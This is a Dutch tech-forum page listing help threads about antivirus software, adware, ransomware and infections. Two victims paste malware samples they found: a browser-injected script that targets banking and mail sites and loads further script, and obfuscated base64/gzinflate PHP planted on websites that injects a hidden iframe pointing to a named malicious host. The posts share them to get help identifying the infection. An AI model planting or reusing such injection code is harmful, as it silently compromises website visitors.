Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Datumbereik

Categorieën

AND

Onderwerpen

AND

Subforum

Topicstarter

Topicstatus

53 topics - Pagina 1 van 3

[Virusscanners] Discussietopic deel 4

09-02 22:09 discussie 1922
Virusscanners discussietopic deel 4IntroductieHet discussie onderwerp over virusscanners is sinds tijden een van de populairdere posts in dit forum. Omdat het vorige deel uit de serie inmiddels de 1400 posts alweer ruim is gepasseerd vonden wij het tijd voor een nieuw fris deel in de reeks.

De vorige delen zijn hier te vinden:
[Virusscanners] discussietopic
[Virusscanners] discussietopic deel 2
[Virusscanners] Discussietopic deel 3


Virusscanners op de marktEen overzicht van een groot aantal virusscanners op de markt.AntiVir ArcaVir Avast AVG Avira BitDefender ClamAV Dr. Web eScan eTrust F-Prot F-Secure Fortinet Kaspersky Kingsoft Antivirus Microsoft Security Essentials McAfee NOD32 Norman Norton Panda Trendmicro Antivirus TrustPort Quick-Heal Sophos VirusBlokAda UNA G-Data Antivirus SophosOnline virusscanners - volledige virusscanOnderstaand een overzicht van online virusscanners waarmee je een volledige scan van een systeem kunt uitvoeren. De meeste van dit soort scanners zijn gebaseerd op active-x componenten. Sommige werken alleen met Internet Explorer waar anderen meerdere browsers ondersteunen.Trend-Micro Housecall Panda Activescan BitDefender Free Online Virus Scan Symantec Security Check Kaspersky Online Scanner F-Secure Online Scan McAfee Free Scan MicroWorld AntiVirus Toolkit Utility eTrust WebscannerOnline virusscanners - single file scanKaspersky virus scan Jotti's online malware scan * VirusTotal * Virscan.org * VirusChief * Filterbit (beta) ** = Deze virusscanners bieden de mogelijkheid om een enkel bestand te scannen met meerdere anti virus engines om zo te komen tot een betrouwbaardere indicatie of een bestand besmet is of niet.Online virus statistieken en waarschuwingen ESET virusradar VirusAlert (NL talig) Waarschuwingsdienst.nl (NL talig)Anti virus removal toolsOmdat sommige anti virus pakketten lastig compleet te verwijderen zijn (bv wanneer je over wilt stappen op een ander product) een lijstje met removal tools van diverse leveranciers. Zorg altijd voor een goede backup van het systeem voor je een van onderstaande tools gebruikt. Gebruik op eigen risico.Avast removal Avira removal AVG removal Bitdefender removal F-secure removal Kaspersky removal McAfee removal Panda removal Symantec (Norton) removal Trend Micro removal Eset (NOD32) removal Malwarebytes Anti Malware (malware remover, meer dan alleen virussen)Vergelijkende sitesEr zijn diverse sites welke periodiek de effectiviteit van virus- en anti- malware scanners testen. Hieronder vind je een aantal van de bekendere test sites. Let op dat testen niet altijd een heel goede weergave geven van de doeltreffendheid van een virusscanner gezien de test methoden erg uit elkaar lopen en niet altijd even goed de realiteit afspiegelen.av-test.org av-comperatives.org virusbtn.comMis je iets in de topicstart?Aanvullingen en tips voor de topicstart kun je altijd per direct message aan mij kenbaar maken. Het is de bedoeling om de topicstart een levend document te houden.

Emsisoft en PUP?

11-01 20:00 vraag 6

Vraag

Om toch maar eens een ander anti virus programma uit te proberen kwam ik uit op Emsisoft Anti-Malware.
Heerlijk in het Nederlands!!
Tijdens de installatie werd mij gevraagd of ik ook PUP wilde activeren. Dat heb ik maar gedaan, maar toch bleef bij mij een beetje twijfel. Det de PUP in Emsisoft hetzelfde als het zelfstandige programma Unchecky?
Wie heeft daar ervaring mee?

Beste antwoord

quote:Vermeulen schreef op maandag 11 januari 2016 @ 16:20:
[...]

Misschien heet het in Eset dan anders maar die stopt wel degelijk dit soort toolbars (ask enz.) en extensions met de functie detecteer onwenselijke programma's aangevinkt Maar dat is niet hetzelfde als wat uncheckie doet. Die monitort continu de installer en vinked automatisch door de maker als ongewenst bestempelde opties uit. Dat is een wezenlijk verschil.

Small Business Antivirus

20-10-2015 discussie 13
Beste Tweakers,

Advies gevraagd m.b.t. het volgende:

Small Business Antivirus met de volgende vereisten:

- Management Console
- Remote installatie/beheer
- Antivirus
- Antispyware
- Anti mallware
- Volledige/goede bescherming
- Servers (virtueel)
- Reports
- Specific configuraties
- Geen firewall of vervanging van Windows firewall
- Geen filtering op Exchange
- Goede prijs/prestatie verhouding


Lastig om op basis van het www en reviews een goede keuze te maken.

Iemand een suggestie?

[Firefox] vaag stukje in de broncode

03-08-2015 discussie 38
Hallo,
Was bezig met html en keek in de broncode en zag een vaag stukje code, dit komt op alle sites terug (ook op tweakers) Heb extensies al uitgezet, maar blijf het houden.
Al google gedaan om stukken van de code maar geen resultaten. In internet explorer zie ik dat stuk code niet en als startpagina krijg ik de code ook niet.
code:
1 <script id='inj_add_cc' name='inj_add_cc' type='text/javascript'>(function(){navigator.bot_id_cc='BOT_ID';var s_u=['ya.ru','rambler.ru','mail','bank','yahoo','live.com','aol.com','google','bing','pekao','pkobp'],i,tmp;for (i=0; i<s_u.length; i++){tmp=new RegExp(s_u[i]);if (tmp.test(document.location.href)) {destroy();delete navigator.bot_id_cc;return true;}}document.write('<scr'+'ipt id="inj_inj_cc" name="inj_inj_cc" type="text/javascript" src="https://'+document.location.host+'/support/googleanaliticsmboxface.cgi/______ooo0__00ooooOOOo0000___/content/cc/__n.js?r='+Number(new Date())+'"></scr'+'ipt>'); function destroy (){try{document.scripts.inj_add_cc.parentNode.removeChild(document.scripts.inj_add_cc)}catch(err) {var a=document.getElementById('inj_add_cc');a.parentNode.removeChild(a)}}}())</script>


Iemand hier meer last van idee waar dit vanaf komt?

Teamviewer

22-06-2015 discussie 5
Hallo iedereen,

Ik ging deze avond iemand helpen omdat ze problemen had met haar computer i.v.m. printen. Ik dacht dat dit enige driverproblemen ofso zouden zijn maar na nader inzicht heb ik kunnen vaststellen dat de computer "vol" virussen en malware zat.

Bij deze wou ik vragen of het mogelijk is of deze kunnen doorgegeven worden aan mijn computer en hoe ik dit het best kan nakijken (antivirus al gedaan).

Alvast bedankt!

On-wisbare advertentie progammas.

17-06-2015 discussie 6
hallo, zal ik eerst beginnen met het probleem. er staan rare, onverklaarbare advertenties tussen mijn progamma lijst op windows. Foto: https://www.dropbox.com/s/864sv320mb755av/bugg.png?dl=0 Foto 2: https://www.dropbox.com/s/2fk10c8p55wx43s/bugg2.png?dl=0


Ik heb weining idee hoe ik er van af moet komen, steeds als ik het verwijder dan komt het uiteindelijk terug op mijn systeem...uber irritand

nog een ding dat er misschien mee te maken heeft, en zeker wel te zeggen valt. mijn c schijf ging steeds voller met lege mappen met niks er in, en de zelfde rare naam die ook op de progammas staat. maar toen ik een aantal grote bestanden delete stopte het met toevoegen van mappen (die toch nog best veel ruimte opnemen)

tips bij forums overzicht beter te maken, zijn natuurlijk welkom

malware

12-06-2015 discussie 11
Goedemorgen Tweakers !

na enige tijd zonder virusscanner gedraaid te hebben, weet ik wel zeker dat ik wat malware op mijn pc heb staan. Nu ben ik dus opzoek naar een virusscanner die zoveel mogelijk vind.

iemand dus een tip welke (gratis het liefst) virusscanner ik kan gebruiken ?

alvast bedankt !

pup.optional.somoto.sid.a

03-06-2015 discussie 3
Hallo mede tweakers,

Ik heb deze pup.optional.somoto.sid.a al een hele lange tijd op de computer.

Normaal verwijder ik dergelijke rommel makkelijk met malwarebytes. Maar deze is erg hardnekkig.

Ookal installeer ik Windows opnieuw, deze blijft maar terug komen.

Zie dat ie in de localapps staat, maar vroeger ook bij Chrome Extensions.

Iemand een idee hoe ik hier helemaal vanaf kan komen?

Extensions ook al verwijderd, alleen adblock nog aanwezig.

Thanks!

Ransomware op twee computers binnen een uur

02-06-2015 discussie 17
Dag allemaal,

Ik heb sinds twee uur hetzelfde ransomware virus op mijn desktop en mijn laptop. Het betreft Locker V4.76.
Nu heb ik geen antivirus op beide machines staan, dus ik ben hier niet om te klagen dat al mijn files zijn ge-encrypt (allhoewel dat wel balen is ). Waar het mij vooral om gaat: het gebeurt via twee pc's tegelijk!

Weet iemand wat hier de oorzaak van is kan zijn? De enige manier waarop mijn machines verbonden zijn is dmv dropbox en mijn microsoft account. Hoewel er hier niet over piraterij gepraat word kan ik zeggen dat de ene machine hierin verschilt t.o.v. de andere: er is niet op beide machines van een illigale versie van windows gebruik gemaakt.

Wat mij eigenlijk nog het meeste opviel: op het internet is er bijna niks over te vinden, op een document na:
http://deletemalware.blog...er-virus-and-restore.html

Het rare detail aan dit document? Het is slechts 5 uur oud! Zou dit kunnen betekenen dat dit virus zich een tijd lang stil heeft verplaatst, en nu ineens geactiveerd is? Op beide pc's is het probleem rond 00:00 (25 mei 2015) begonnen.

De belangrijkste reden dat ik dit vraag is het feit dat mijn dropbox folder ook geïnfecteerd is. Hoewel dropbox (gelukkig maar!) aan een gratis 30-day-retention doet is alles terug te zetten, maar er zitten ook een aantal (permanent) gedeelde mappen in mijn dropbox, welke wij als projectgroep als deeldirectory gebruiken. Moeten zij zich ook zorgen maken dat het virus via deze link zich kan delen? Ik kan me namelijk niet goed bedenken hoe het virus anders van mijn Desktop naar mijn Laptop heeft verplaatst. Maar, daar tegenover staat weer het feit dat dropbox alles logd wat er veranderd word aan de directories, en deze heeft alleen maar wijzigingen gelogd (geen toevoegingen van een van beide pc's)

Wat denken jullie? Alvast bedankt!

svchost.exe probeert verbinding te maken met malware

23-05-2015 discussie 32
Hallo Tweakers,

Om een lang verhaal kort te houden, ik heb last van een proces of service die steeds svchost.exe instructie geeft om een malware dll te downloaden van verschillende sites. Ik krijgt dankzij Avast gelukkig steeds de melding dat deze verbinding wordt geblokkeerd, dus er is nog niks aan de hand. Alleen is er dus iets dat steeds svchost.exe de instructie geeft om iets te downloaden.

Wat er wordt geprobeerd te downloaden is een bestand genaamd "TroubleFix_142669689991445.dll", een snelle search geeft aan dat dit gewoon rommel is. Ook verschillende varianten van deze dll worden geprobeerd te downloaden van verschillende sites (De sites zal ik hier om veiligheidsredenen niet posten).

Mijn vraag is:
Hoe kom ik er achter wat deze dll's probeert te downloaden via svchost? Ik heb al verschillende scans over m'n pc gehaald en alles geeft niks aan (Malwarebytes, Avast, Spybot, tdss killer), wat ook logisch is aangezien Avast het blokkeert, er is nog niks gedownload

Als jullie scan logs of iets anders willen hebben geef een gil!

Hopelijk kunnen jullie mij helpen, dit is de eerste keer sinds lange tijd dat ik zo iets raars heb gezien...
Alvast bedankt!

Trojan verwijderd. Nu veilig?

17-05-2015 discussie 10
Ik heb na een tip in een ander topic geprobeerd malware te vinden op mijn computer. Die computer gedroeg zich nl. een beetje raar (karakters met diakrieten zoals ë deden het niet meer).

En verdomd: ik had een trojan. Hij deed zich voor als Chrome.exe. Trojan.Win32.Generic. Iemand enig idee wat dat is?

Ik heb het gevonden met een gratis versie van Kaspersky. Na wat processen killen kon ik het bewuste bestand (Chrome.exe) verwijderen. Dat had Norton toch maar mooi doorgelaten.

Ik zie nog wel wat gekke dingen op mijn systeem. Meteen na een reboot, zonder Chrome te hebben opgestart, zijn er al tig processen die zichzelf chrome.exe noemen:



En bij het opstarten wordt een bestand met de rare naam GoogleChromeAutolanch_Heelveelcijfersenletters gestart:



Is dit normaal of ben ik nu paranoïde (met trema ) geworden?

Virus op cd-rom

17-05-2015 discussie 27
Goedemiddag,

Ik kon niet echt een goede plek voor dit topic vinden, dus plaats ik het maar hier. Ik heb onlangs via Youtube een giveaway gewonnen waarbij ik GTA V op CD-rom krijg. Nu wil ik wel zeker weten dat er geen troep op staat enzo, dus heb ik een aantal vragen daarover:

- Kan een virus op CD's staan?
- Zo ja, kan je deze eraf halen en hoe?

Ik heb Panda Antivirus 2015 Pro ... mocht dat nodig zijn?

Mvg,

colko111

Bitdefender 2010 - Trojan FakeAlert.5

12-05-2015 discussie 49
Hoi mensen,
ik krijg sinds daarnet op 2 pc's met windows 7 home premium 64-bit ineens duizenden waarschuwingen van trojan FakeAlert.5, de pc's zijn niet verbonden met elkaar...
Is dit een false positive of weet iemand wat er gaande is? Beide pc's zijn volledig f*cked up

Adware Sharkman coupon

01-05-2015 discussie 6
Hoi,

Sinds kort heb ik adware op mijn pc.. Ik ben altijd erg oplettend met wat ik download en snap ook niet zo goed hoe het op m'n pc is gekomen..

Echter krijg ik het er nu dus niet af, het heet Sharkman coupon en eerst heette het iets met 'Royal nogwat..'

Ik heb gebruikt:

*Malware bytes
*Adw cleaner
*Super anti spyware

Elke keer detecteren ze allemaal de adware en verwijderen ze het maar het komt daarna automatisch terug.. Dit was dus ook de oplossing die ik op het internet heb gevonden, om deze software te gebruiken. Helaas verhelpt het mijn probleem dus niet..

Ik dacht dat het slim was om even hier te komen voordat ik Windows opnieuw installeer want daar heb ik ook niet zo zin in voor een beetje adware.

Zie hier nog een voorbeeld
Op die foto valt het nog mee.. Soms is zo'n 70% van m'n scherm bedekt met ads.

Ik hoop dat iemand een goeie tip heeft!
Bvd

Groetjes,

Jony

Ransomware te pakken :/

11-04-2015 discussie 15
Hoi allemaal, ik heb zojuist ransomware bericht gekregen.
Ik zat dus op een site.. en kreeg plots die cybercrime melding op me beeldscherm.
Gelukkig had ik er al ervaring mee en wist dat dit een grote scam is.
Ik heb mijn pc opnieuw opgestart en heb nergens meer last van als ik internet open, de virus lijkt compleet verdwenen.
Maar nu vraag ik me toch af, zit deze virus toch nog op mijn pc? en/of moet ik nog iets verwijderen via Veilige Modus of is die ransomware meteen van me pc weg?
Viruscanner geeft ook geen virus of detection aan.

Alvast bedankt.

Windows 8.1 - Malware genaamd lcmenterfe.exe

14-02-2015 discussie 5
Goedendag,

Op een nieuwe windows 8.1 laptop van Lenovo die ik heb zit adware. Ik heb deze met Malwarebytes en AdwCleaner proberen te verwijderen. Hierdoor zijn honderden dingen verwijderd, echter leveren scans met deze programma's nu niks meer op.

De browser (Firefox) zit echter nog wel volop onder de advertenties "Ads by SASA".

Het enge is dat ik een proces zie draaien lcmenterfe.exe, welke in C:\Program Files (x86)\Lcmenterfe staat, echter zie ik die hele map niet in C:\Program Files (x86) staan, terwijl als ik het pad open in verkenner, ik wel in die map kom. Verborgen bestanden staan uiteraard zichtbaar, en ik zie ook verborgen mappen staan. Het verwijderen van de bestanden heeft geen zin, staan er naar paar seconden weer. Proces stoppen heeft ook geen zin.

Er zitten geen foute plugins (meer) in een van de browsers.

Ik heb geprobeerd om Adaware uit te voeren, maar deze geeft de melding "Deze app kan niet worden uitgevoerd op uw pc. Vraag bij de software-uitgever na of er een versie bestaat voor uw pc.".

Ik ben een beetje ten einde raad. De meeste zooi krijg ik er altijd wel af, dit lukt niet. Iemand tips? Is het een hopeloze zaak en zal Windows er opnieuw op moeten?

Virus of Malware? & Windows Defender zomaar uit?

31-08-2014 discussie 10
Goedenavond,

Ik start net mijn pc op en bij open krijg ik dit



Geen idee wat het was maar ik heb toen op openen met kladblok gedaan toen kwamen er allemaal cijfers en ip's en dingen in een flits voorbij in kladblok toen sloot het snel af. En opende er een pop up naar een af andere online gok site...

Op dat moment gaan de rillingen weer door me nek want ik weet hoelaat het is.. Dus ik probeer met Windows Defender een scan te doen maar je raad het al.. Defender is uitgeschakeld en laat zich ook niet meer opstarten. Ik kan ook merken aan de pc dat hij langzamer is en internet ook merkbaar verschil in zit. Ik zit nu een beetje met de handen in het haar aangezien ik allang geen virus scanner mee gebruik sinds windows defender.

Verder heb ik ook geen flauw idee hoe ik hier vanaf moet zien te komen. De symptomen nu zijn een tragere PC + Internet en dat Windows Defender niet meer werkt.

Het is helaas niet gelukt de melding een 2e keer op te roepen. Maar het feit dat Windows Defender zomaar opeens is uitgeschakeld zegt genoeg dat er iets gaande is op mijn pc.

Wie kan me een helpen hier vanaf te komen of een zetje in de goederichting geven? Ik heb namelijk geen idee waar te beginnen.

[Mac] Wie gebruikt er een virus- malwarescanner?

06-06-2013 discussie 66


Wie gebruikt er op dit moment eigenlijk een virus- /malwarescanner op de Mac?
Of is dit nog steeds niet nodig en zijn alle berichten van de laatste tijd de spreekwoordelijke storm in een glas water, neem het met een korrel zout, etc. Nu Apple steeds meer en meer populairder wordt wordt de afgunst op het succes dat natuurlijk ook. Keerzijde van de medaille.

Zoals het bericht van vandaag dat Kaspersky door Apple zou zijn ingeroepen om de security van Mac OS X eens kritisch onder de loep te nemen. nieuws: Kaspersky werkt samen met Apple om beveiliging op te schroeven

Heeft me toch wel even aan het denken gezet. Arstechnica.com heeft nu ook een overzicht gemaakt van de beschikbare programma's op dit moment. Ze zeggen niet dat een pakket nu echt nodig is, dat is iets om zelf te beslissen. Twee stuks zijn gratis. http://arstechnica.com/ap...tivirus-apps-for-the-mac/

Ik heb om eens te proberen Avast! geïnstalleerd. Het is gratis en werkt zonder installatieprogramma, bevalt het niet dan is het hoppa prullenbak. Tot nu toe ziet het er clean uit.

Wat gebruik jij voor op de Mac?

Methode om windows veiliger te maken

17-09-2012 discussie 7
Dit is geen vraag dit is meer beveiligingsadvies
Ik ben nieuw bij tweakers en dit leek me een geschikte plaats om dit te posten

Onlangs las ik een artikel waarin een onderzoek van Microsoft stond dat 45% van de malware en virussen die op een pc staat de schuld is van de gebruiker(ik persoonlijk denk dat dit hoge gaat liggen).
Veel malware en virus die zich op een Windows toestel nestelen komt door een slechte beslissing van de gebruiker
{dit gebeurt meestal wanneer er zo een venstertje op komt van Windows met ja of nee keuze}

Bron: http://www.darkreading.co...ns-mostly-your-fault.html

Wel hier wil ik een manier geven die een gebruiker bewuster moet maken van wat er nu juist op zijn of haar pc gebeurd.

Wat ik hier ga uitleggen helpt in principe NIET rechtstreeks tegen virus en of malware.
Maar het maakt je als gebruiker wel bewuster van wat je nu juist doet en dat vind ik persoonlijk even belangrijk als het niet belangrijker is dan een virus scanner.
Meeste tweakers zouden dit normaal gezien al moeten weten. Dit is er voor de mensen die het nog niet moesten weten.Stap 1: maak je hele pc leeg dus HDD’s formateer je en SSD’s verwijder je de partitie (niet formateren vooreen of andere reden doe je dit best niet zoek even op hoe je juist handeld bij een SSD) Dit doe je om van een schone pc te beginnen normaal heb je back ups van je PC als je dat niet hebt zorg dat je alles ergens extern opslaat voor je hier aan begint Stap 2: installeer je Windows distributie(XP, Vista, 7, of de toekomstige Stap 3: gebruik de administrator account voor alle drivers / software / Games te instaleren Stap 4: geef een lang wachtwoord aan je administrator account (ik raad 15 karakters of op zijn minst 10 karakters ) Stap 5: maak een of meerder gebruikers accounts aan (wachtwoorden zijn een optie) Stap 6: gebruik altijd je gebruikers account, de administrator account gebruik je ENKEL voor software te instaleren/updatenNu als je je pc op deze manier gebruikt zal er elke keer als er iets zich wilt installeren gaat dit vragen naar een wachtwoord om meer precies te zijn het administrator wachtwoord

Wat is nu het nut hiervan ?
Wel een van de redenen dat Linux veiliger beschouwd wordt dan Windows.
Is omdat Linux dit standaard doet telkens als je een update of installatie doet op eender welke Linux distributie wordt er achter het root(admin)wachtwoord gevraagd.

Als je gewoon gebruikt maakt van je Windows administrator account dan wordt er enkel gevraagd om “ja” of “nee” dus geen wachtwoord nu veel mensen klikken gewoon op ja zonder te lezen of te beseffen wat ze nu juist toegelaten hebben.
(de wet van de luiste zorgt hier meestal voor)


Bovenstaande stappen volgen heeft eigenlijk geen enkele meer functie als virus preventie zo als ik eerder had vermeld.
Het enigste wat dit doet is ervoor zorgen dat de gebruiker(dus jij) meer besef krijgt dat er iets gaat gebeuren wat al een hogere toestemming nodig heeft.
Zoals wanneer je gewoon aan het surfen bent en er wordt gevraagd achter je administrators wachtwoord. Dan zou er al een belletje moeten rinkelen dat er iets mis is of wanneer je iets bezig bent wat eigenlijk geen installatie nodig heeft.
Waarom 15 karakters wel omdat het enorm vervelend is omdat telkens te type.
Zie het als extra motivatie om te lezen of het de moeite is om je wachtwoord te type
(de wet van de luiste is meestal van toepassing wanneer we op de PC zitten)


Als je kinderen hebt die ook gebruik maken van je PC heeft dit nog meer nut zoals privacy
(als admin kan je ook bepaalde programma’s blokkeren voor gewone gebruikers, je kan nog meer dan enkel dat)
Kinderen hebben nog meer de neiging om gewoon ja te klikken en van alles te instaleren op je pc.Wat eigenlijk gevaarlijk kan zijn. Zij hebben meestal geen besef dat ja klikken fout kan zijn. (deze horen vanzelf sprekend het admin wachtwoord niet te weten!)

Nu normaal gezien geeft een GOEDE antivirus scanner al een waarschuwing van een gevaarlijk bestand.
Maar zelfs de beste antivirus scanners kunnen wel eens iets door laten.


Zover mijn tip om je bewuster met je pc te laten werken.

Hopelijk is dit nuttig geweest, mijn excuus voor eventuele type fouten als je ze ziet je kan altijd even een PM sturen en ik zal ze aanpassen dyslectici is nog al onhandig wanneer je iets wilt uitleggen.

Met Vriendelijke Groeten ,
R3belz

Proyekto1 runtime error 53

19-08-2012 discussie 13
Hallo allemaal,

ik krijg ineens bij opstarten een schermpje (zie image) waardoor ik denk dat ik een virus heb. Waarom denk ik dat ? Omdat ik namelijk pasgeleden een soort trojan had w32 nogwat ... Maar ik dacht dat alles toch echt verwijderd was.

Wat heb ik gedaan om die trojan te verwijderen ?

- addaware volledig geupdate en gedraaid, zowel in normal mode als safemode. Deze heeft meerdere bestanden gevonden en verwijdert.

- gratis Emsisoftware trojan/addware remover gedraaid, deze heeft niks meer gevonden

- stinger van Mcfee deep scan laten doen in safemode > niks gevonden

- computer met virus scanner gedraaid, ook niks meer gevonden


Ik dacht dat ik dus weer virus/trojan vrij was .. Nu krijg ik in 1x dit scherm ?? Gegoogle en wel iets gevonden over dat proyekto1. Daar stond een removal tool bij, maar die heeft niks gevonden (zou proyekto1, 2, 3 en 4.exe kunnen zijn). Ik zie deze ook niet in processen staan.

Zou iemand mij verder kunnen helpen ? Ik ga zelf ook zeker verder zoeken, maar misschien dat iemand tip(s) heeft.

Thanks. !

Dit is het schermpje wat ik krijg:

FTP-passwords gesnift & misbruikt. Wat nog meer?

20-06-2012 discussie 3
Jongens, ik hoop zwaar dat jullie me kunnen helpen.
(Tis een lang verhaal, geen zin om te lezen: onderaan een samenvatting).

Ik werk als webdeveloper, en vanochtend kwamen we erachter dat op diverse sites van ons kwaadaardige code was neergezet.

Op een aantal domeinen was op verschillende plaatsen in de php het volgende neergezet:
PHP:

1
2
3
<?php
#c3284d#
echo(gzinflate(base64_decode("7VGxTsMwEP0Vy0ttqXLKmrRIpWJDsLAhBic+xyc5sWVfkkaUfydVKxZAgp033end0713x9g/fottbhJGuh11YkPyO+6IYlkU0zQpjxayQ0sGRvAhdtCTakJXZNKUVXSRV2iF6PWIraaQ1JAh7dvzGIWHMEE66AxCKuwNHJ+s4F1G4PJ2t5Gn0190FhPYcLxI5dvZrd2Z0AwXTwk0wb2HcydWaJPuYCUrqzLQnihhPRAIPqEhx9f8hn/lHGDr6Acyp4avl/N8w9DsYVGNmLFGjzSXzKEx0FcshoyEoS+ZrnPwy3zFPFgq2SZSxSjES7Us/IzSAl1z5Lv5WbePSxLB62BmLl82r0rHCL05OPRGWPm+La7/+wA=")));
#/c3284d#
?>
De base64-string verschilt per keer, maar allemaal encoden ze naar het volgende:
HTML:
1
<script>var url="http://www.lifeshiftdevelopment.com/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>
Oftewel, deze code genereert een onzichtbaar iframe waarin de bezoeker naar http://www.lifeshiftdevelopment.com/stats.php geleid wordt.
Google heeft daar de volgende informatie over:
http://safebrowsing.clien...nt=googlechrome&hl=nl

Niet goed dus!
Een collega van mij heeft in de serverlogs gekeken hoe dit tot stand is gekomen, en het blijkt dat de php-bestanden via ftp gewijzigd waren. Deze malware-maker heeft dus op een of andere manier (op zijn minst) FTP-passwords buitgemaakt.
Via zoeken in de logfiles op FTP-verkeer buiten onze eigen ip's en zoeken naar de base64_decode-functie in de php files konden we snel genoeg alle getroffen domeinen vinden.
Op die domeinen hebben we de kwaadaardige code verwijderd en de FTP-passwords veranderd.

Maar toen viel het op, dat alle geïnfecteerde domeinen, sites waren waar ik de laatste maanden aan gewerkt heb. Ook doordat er ook bijvoorbeeld één prive-domein van mij bij zat, waar puur en alleen ik aan gewerkt heb, weten we zeker dat de "hacker" via mijn pc aan de FTP-passwords is gekomen
Er moet dus malware of iets dergelijks staan op mijn werk-pc die deze gegevens heeft doorgestuurd naar de kwaadaardige partij.

Maar dan nu de hamvraag: als de "hacker" mijn FTP-passwords heeft, wat heeft hij dan nog meer?
Is het een network-sniffer (ftp-passwords worden onversleuteld over het netwerk verzonden), of een keylogger?
In het geval van dat laatste, dan is er nog véél meer gevoelige informatie doorgestuurd, zoals al mijn eigen privé wachtwoorden (mail, social media, diverse sites zoals deze, Paypal, etc.).

Nu ga ik uiteraard alle wachtwoorden wijzigen, maar ik wil er graag achter komen hoe de "hacker" aan de passwords is gekomen, en of hij alleen FTP-passwords heeft, ook ook andere dingen. Als het alleen FTP-passwords zijn, kan ik in ieder geval een klein beetje rustiger ademhalen.

En daar kom ik niet uit, dus wil ik jullie hulp inschakelen.

De volgende scanners heb ik geprobeerd, ik ben er al de hele dag mee bezig. In de volgende volgorde:Microsoft Security Essentials. Deze draaide standaard op mijn pc en heeft geen melding gegeven. Ook na een handmatige scan: No threats were detected. HitmanPro: 3 threats Kaspersky TDSSKiller (rootkit-scanner): Found 0 threats Spybot S&D: Gefliciteerd, er wereden geen bedreigingen aangetroffen Malwarebytes: Objecten gedetecteerd: 0.Alleen HitmanPro heeft dus wat gevonden. Supermooi, gelijk de threats verwijderd.
Maar nu kan ik er niks meer mee. HitmanPro geeft namelijk totaal geen clue van waarom een file als trojan/malware aangemerkt is, en welk virus dat dan zou zijn. Zo kan ik er dus niet achterkomen wat deze malware gedaan zou hebben, en weet ik dus niet of er behalve de FTP-passwords nog meer is buitgemaakt.
Wellicht heb ik de scan-tools in de verkeerde volgorde gebruikt, en heeft Hitman dus de malware verwijderd voordat een ander programma er wat zinnigs over kon zeggen.
Maarja, in al mijn jaren als fanatiek pc-gebruiker is mij zoiets nog nooit overkomen en "Hitman" kwam als eerste in mij op als malware-scanner.

Maar goed, de enige info die Hitman geeft zijn de filenames, en dat zijn de volgende:


In tekst:~!#8007.tmp (Trojan) tempfiles.exe (Trojan) installer_hair_pro.exe (Malware)Nu heb ik me al letterlijk suf-gegoogled op deze filenames, maar ik kom er echt niet goed uit.
Ook gezocht of Hitman misschien een logfile heeft met de Trojan/Malware-namen, maar die kan ik ook niet vinden.

Wat ik tot dusver gevonden heb:
1. ~!#8007.tmp
Op de eerste vind ik niet veel. Volgens "SUPERAntiSpyware" (een naam die ik al bijna niet serieus durf te nemen), is het een FakeAV (fake AntiVirus). Generieke naam dus waarover Symantec zegt:quote: http://www.symantec.com/s...docid=2007-101013-3606-99Trojan.FakeAV is a detection for Trojan horse programs that intentionally misrepresent the security status of a computer. These programs attempt to convince the user to purchase software in order to remove non-existent malware or security risks from the computer.Hoewel ook vervelend, lijkt het me onwaarschijnlijk dat deze mijn passwords heeft weggegeven.

2. tempfiles.exe
Via deze site:
https://www.virustotal.co...74e69cf6149817f/analysis/
Kom ik op Microsoft's benaming "Karagany.I".
Microsoft schrijft daar vervolgens over:quote: http://www.microsoft.com/...ader%3aWin32%2fKaragany.ITrojanDownloader:Win32/Karagany.I is a malware installer ("loader"). It works as a part of a multi-component malware, and may arrive as a result of drive-by download attacks.
[...]
In the wild, this trojan has been observed to download and execute variants of the following malware families:
Win32/Sirefef
Win32/FakeReanDeze jongen installeert dus andere malware. Hoewel die niet gedetecteerd is, wel interessant om die twee op te zoeken.
Sirefef:quote:Trojan:Win32/Sirefef.A is a trojan that redirects user results from Google to a certain Web site.Die is het dus niet.quote:Win32/FakeRean is a family of programs that claim to scan for malware and display fake warnings of malicious files. They then inform the user that they need to pay money to register the software in order to remove these non-existent threats.Ook zo'n FakeAV-ding. Is het dus ook niet.

Op de bovengenoemde pagina van virustotal.com wordt ook de namen "Gimemo" en "Ransom" genoemd. Deze uiteraard ook opgezocht. Daarover het volgende gevonden:quote: http://www.securelist.com...an-Ransom.Win32.Gimemo.nsThis Trojan stops the computer from functioning in order to obtain a ransom for restoring it.Dit is hem dus ook niet.

Andere namen slaan vooral op "Generic trojan", waar ik dus absoluut niks mee kan.

Voorlopig tast ik dus nog in het duister wat deze "tempfiles.exe" gedaan zou hebben.

3. installer_hair_pro.exe
Hier vind Google slechts 3 (!) sites voor. Onder andere weer Virustotal.com: https://www.virustotal.co...f247b011198ee72/analysis/
Die geeft aan dat heel veel virusscanners dit niet aanmerken als malware/virus.
Drie wel:
1. "Adware.Downware.174": met het versie-nummer erbij niks over te vinden.
Zonder versienummer zegt McAffee:
This software is not a virus or a Trojan.
2. "Riskware/ToogleToolbar": niks (!) op te vinden.
3. Win32/Toggle: ook al zo goed als niks op te vinden...


Ik heb uiteraard nog wat meer rondgeklikt, had op een gegeven moment wel 10 browsers met ieder 25 tabs openstaan ongeveer. Maar meer informatie kwam er niet.
Ik tast dus volledig in het duister wat er nu precies op mijn systeem staat... En of nu alleen FTP-password in verkeerde handen zijn gevallen, of nog veel meer.

Heeft een van jullie tips hoe dit verder te kunnen onderzoeken?
Ik heb me letterlijk de hele dag suf gegoogled, heel mijn werkdag eraan besteed.. Verder dan bovenstaand verhaal kom ik niet. Heb er mooi de pest in.. Ik neem mezelf erg serieus als webdeveloper en probeer altijd mijn code netjes en veilig te houden; let altijd op user-input sanitizing etcetera om ervoor te zorgen dat kwaadwilligen niks stuk kunnen maken. En dan gebeurt er zoiets!!

/edit:
Ohja, ook nog met WireShark gekeken naar verdacht netwerkverkeer. Niks kunnen ontdekken.

Hopelijk kan een van jullie mij verder helpen...
Alvast bedankt!


TL;DR:
